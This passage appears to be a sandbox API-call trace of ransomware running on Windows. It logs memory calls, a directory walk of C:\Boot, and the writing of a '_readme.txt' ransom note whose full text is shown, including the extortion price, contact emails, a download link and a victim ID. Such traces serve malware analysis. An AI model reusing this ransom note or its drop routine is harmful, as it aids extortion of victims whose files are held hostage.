hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.671] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.672] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.672] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.672] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.672] PathFindFileNameW (pszPath="") returned="" [0090.672] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.673] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.673] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.673] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.673] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0090.673] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.673] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.673] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0090.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.674] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.674] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.674] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.674] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.675] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.675] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.675] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.675] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.676] CloseHandle (hObject=0x5cc) returned 1 [0090.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.676] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.676] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.676] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa31cf920, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa31cf920, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31ef950 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7540 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.677] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9c28 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0090.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c7540 | out: hHeap=0x680000) returned 1 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.678] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef478 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.678] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa8) returned 0x3152ab8 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4f0 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 